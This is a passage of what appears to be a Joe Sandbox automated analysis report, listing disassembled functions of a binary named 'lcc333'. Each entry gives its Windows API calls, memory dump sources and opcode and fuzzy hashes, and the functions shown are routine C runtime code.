                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF714C9CF4B), ref: 00007FF714C9D07C
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF714C9CF4B), ref: 00007FF714C9D107
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                          • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                          • Instruction ID: 054e0fabb91316752f8fdab88e7bad39ceab42b9e6e8cba61129b18488fe9b8a
                                                                                                                                                          • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                          • Instruction Fuzzy Hash: D291DA33E18E5165F760AF66D8C027DA7A0BB46BA4F944137DE0E63694EF38D44AC720
                                                                                                                                                          Function 00007FF714C9F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                          • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                          • Instruction ID: 43463cee2f4dd7b4162974737ac818a8f1f77925e135db84ad363e777eb223c9
                                                                                                                                                          • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                          • Instruction Fuzzy Hash: 6A513A72F049129AFB14EF65DDE12BCA761AF45778F900236DD1D52AD4EF38A40AC710
                                                                                                                                                          Function 00007FF714C9577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2780335769-0
                                                                                                                                                          • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                          • Instruction ID: a688c7c9cc8ea782617aceaf3b1181c21d7d3eb639309bb917571fce743eae08
                                                                                                                                                          • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                          • Instruction Fuzzy Hash: F051A533E04A4199FB10EF72D8903BDB7A1AB59B68F514836DE0D47688EF38D445C764
                                                                                                                                                          Function 00007FF714C95628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                          • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                          • Instruction ID: 093b36707c825e42591743e0cc80d15840bdefc9176b8a979a3ecfad149d407c
                                                                                                                                                          • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                          • Instruction Fuzzy Hash: 02419623D18B8193E610AF22D990369B260FBA57B4F505336E65C03AD5EF7CA1A48710
                                                                                                                                                          Function 00007FF714C8CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                          • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                          • Instruction ID: f56b716cec8944425e8e7cbd2a911e2c83d98f65b213ed2e1d0f8a471caf2761
                                                                                                                                                          • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                          • Instruction Fuzzy Hash: A4313731E0894741FA24BF67D8D23B99691AF537A4FC45437EA0E472D3EE2DA80D8230
                                                                                                                                                          Function 00007FF714C99A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                          • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                          • Instruction ID: 47550fdbb9f863ad4d74f1935913a471c2d55b986204906398f944ff96c74171
                                                                                                                                                          • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                          • Instruction Fuzzy Hash: 1ED06715B08B0652EB143F729CD90B89255AF4AB21FA41C3ACA0A06397FD2CA84D4320
                                                                                                                                                          Function 00007FF714C9013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                          • Instruction ID: 81f7a3d758d4b56cfba70f01e2ed153dfa14e8f9b8bb21e5a8d02dad6c4324fc
                                                                                                                                                          • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                          • Instruction Fuzzy Hash: 04512CA1B09E41A6E728BE27DC8067AE290BF42BB4F944636DD7C037C5EE3CD4048620
                                                                                                                                                          Function 00007FF714C9C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                          • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                          • Instruction ID: 76dec497209d907faf3eced7f88ea912c66b3dc9453b038f5c3e141465a3244f
                                                                                                                                                          • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                          • Instruction Fuzzy Hash: 7111C476618E8181DA20AF26F894169E361AB46FF4F944332EF7D077D9EE3CD0198714
                                                                                                                                                          Function 00007FF714C95924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF714C95839), ref: 00007FF714C95957
                                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF714C95839), ref: 00007FF714C9596D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1707611234-0
                                                                                                                                                          • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                          • Instruction ID: aadbb629b838d664c436ba2e404efb630bb2b5b325dae3ac33ccafc3f12100d4
                                                                                                                                                          • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                          • Instruction Fuzzy Hash: 2211823260CA1281EA546F16E89103AF760EB96B71F90023BF699819D4FF6CD019DB20
                                                                                                                                                          Function 00007FF714C9A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A95E
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF714CA2D22,?,?,?,00007FF714CA2D5F,?,?,00000000,00007FF714CA3225,?,?,?,00007FF714CA3157), ref: 00007FF714C9A968
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                          • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                          • Instruction ID: 83118707fbb1b24b49f614ca4cd2157100101837af6cd70fff1fa659748c3415
                                                                                                                                                          • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                          • Instruction Fuzzy Hash: B6E04F51E19A4352FE187FF3E8D5179D2516F86B20FC50436C90D422A1FE2C68498230
                                                                                                                                                          Function 00007FF714C9AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF714C9A9D5,?,?,00000000,00007FF714C9AA8A), ref: 00007FF714C9ABC6
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF714C9A9D5,?,?,00000000,00007FF714C9AA8A), ref: 00007FF714C9ABD0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                          • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                          • Instruction ID: 219012294e5ac5c113b05e3a91869b002b3fc2ceb43c7a9b6b635c5db4571b12
                                                                                                                                                          • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                          • Instruction Fuzzy Hash: A421A721F18E8251EE607F57D8D037992829F86BB4F844237EA1E477D5EF6DE4494320
                                                                                                                                                          Function 00007FF714C9BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                          • Instruction ID: 495ab047fcfb6d9a4282d3329b3e3bd18f3a9e03c04c2342f03cced32791c702
                                                                                                                                                          • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                          • Instruction Fuzzy Hash: 7841CC32514A4167EA34AF1AD980179F360FB57B60FD01132D68E476D1EF3DE406CB60
                                                                                                                                                          Function 00007FF714C87F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                          • Opcode ID: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                          • Instruction ID: 3ecb7ccefa9ea888513569628618f9c0ca893b518e0ef635c8ad498461c9cc7d
                                                                                                                                                          • Opcode Fuzzy Hash: 7026eb3b68f3585a2f5768ea15c5ca7bda34a28a3ae4cdbb6486ed2f903c9d01
                                                                                                                                                          • Instruction Fuzzy Hash: 7A21A721B18A5346EA50BE23B8453BAD641BF46BE4FC84432EE0C07B86DF7DE049C230
                                                                                                                                                          Function 00007FF714C9B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                          • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                          • Instruction ID: 2e51f7a8dc1c152c107e99bc38ec37a9e25f422b94fc14e5381c30d54a962bde
                                                                                                                                                          • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                          • Instruction Fuzzy Hash: 13312D22A28E02A5E6117F56DC8136DA660BB42BB5FD2013AE91D073D2FE7CA4498735
                                                                                                                                                          Function 00007FF714C99961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                          • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                          • Instruction ID: 15df9d72b82bef1e2e5bbbd0e2cd679842652586044a8771e47de33e991f048c
                                                                                                                                                          • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A172A04B469AEB24AF65C8C02EC73A4FB05728F84063BE75C06BD5EF38D548C750
                                                                                                                                                          Function 00007FF714C95F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
